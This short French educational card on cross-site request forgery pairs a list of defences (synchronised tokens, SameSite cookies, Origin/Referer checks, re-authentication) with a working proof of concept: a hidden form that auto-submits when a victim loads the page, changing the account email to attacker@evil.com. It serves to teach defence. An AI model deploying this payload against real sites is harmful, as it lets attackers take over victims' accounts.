CSRF — Forcer des actions sur un compte

OWASP A01 Session

Exploit et défenses

Défenses : Token CSRF synchronisé (valeur aléatoire vérifiée à chaque requête) · SameSite=Strict sur les cookies · Vérifier les headers Origin et Referer · Re-authentification pour les actions critiques

<!-- Auto-soumis quand la victime visite la page -->
<form id="f" method="POST" action="https://target.com/change-email">
  <input type="hidden" name="email" value="attacker@evil.com">
</form>
<script>document.getElementById("f").submit();</script>